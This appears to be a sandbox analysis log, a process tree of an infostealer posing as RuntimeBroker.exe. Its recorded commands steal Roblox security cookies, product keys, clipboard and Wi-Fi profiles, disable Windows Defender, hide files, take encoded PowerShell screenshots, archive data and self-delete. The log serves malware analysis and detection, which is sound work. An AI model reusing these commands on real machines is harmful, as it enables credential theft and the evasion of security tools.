C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"19⤵PID:3216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY20⤵
- Command and Scripting Interpreter: PowerShell
PID:4408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"19⤵PID:5784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY20⤵PID:2880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"19⤵PID:5864
-
C:\Windows\system32\getmac.exegetmac20⤵PID:1080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI53842\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\X0RqT.zip" *"19⤵PID:1132
-
C:\Users\Admin\AppData\Local\Temp\_MEI53842\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI53842\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\X0RqT.zip" *20⤵
- Executes dropped EXE
PID:3588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"19⤵PID:4172
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption20⤵PID:3912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"19⤵PID:5484
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵PID:6140
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory20⤵PID:2464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"19⤵PID:2772
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid20⤵PID:2876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"19⤵PID:4228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER20⤵
- Command and Scripting Interpreter: PowerShell
PID:4568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"19⤵PID:2944
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name20⤵
- Detects videocard installed
PID:5532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"19⤵PID:1176
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault20⤵PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""19⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1508 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵PID:6128
-
-
C:\Windows\system32\PING.EXEping localhost -n 320⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3476
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"16⤵
- Executes dropped EXE
PID:1388 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"17⤵
- Executes dropped EXE
PID:5468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"15⤵
- Executes dropped EXE
PID:5860 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"16⤵
- Executes dropped EXE
PID:3444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"14⤵
- Executes dropped EXE
PID:5896 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"15⤵
- Executes dropped EXE
PID:5580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"13⤵
- Executes dropped EXE
PID:1368 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"14⤵
- Executes dropped EXE
PID:5316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"12⤵
- Executes dropped EXE
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"13⤵
- Executes dropped EXE
PID:5852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"11⤵
- Executes dropped EXE
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"12⤵
- Executes dropped EXE
PID:5472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"10⤵
- Executes dropped EXE
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3828
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"10⤵
- Executes dropped EXE
PID:1940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4724 -
C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"9⤵
- Executes dropped EXE
PID:3764
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
PID:3276 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"9⤵
- Executes dropped EXE
PID:3640 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4800 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"11⤵PID:2684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"11⤵PID:4292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3476
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All12⤵
- Deletes Windows Defender Definitions
PID:5496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""11⤵
- Hide Artifacts: Hidden Files and Directories
PID:3400 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"12⤵
- Views/modifies file attributes
PID:4552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"11⤵PID:4172
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"11⤵PID:4108
-
C:\Windows\system32\tasklist.exetasklist /FO LIST12⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"11⤵PID:8
-
C:\Windows\system32\tasklist.exetasklist /FO LIST12⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"11⤵PID:2336
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"11⤵
- Clipboard Data
PID:3720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard12⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"11⤵PID:4912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:3624
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST12⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:1212
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"11⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5116 -
C:\Windows\system32\netsh.exenetsh wlan show profile12⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"11⤵PID:3412
-
C:\Windows\system32\systeminfo.exesysteminfo12⤵
- Gathers system information
PID:5172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="11⤵PID:1576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5144 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ntaujb1a\ntaujb1a.cmdline"13⤵PID:5340
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7.tmp" "c:\Users\Admin\AppData\Local\Temp\ntaujb1a\CSC5E57E1B5C66E4001927E6FAA0408BA7.TMP"14⤵PID:3440
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:5564
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:6004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"11⤵PID:5700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:6128
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:1396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:2532
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:4408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:5544
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:5624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"11⤵PID:5724
-
C:\Windows\system32\tree.comtree /A /F12⤵PID:5780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"11⤵PID:5756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY12⤵
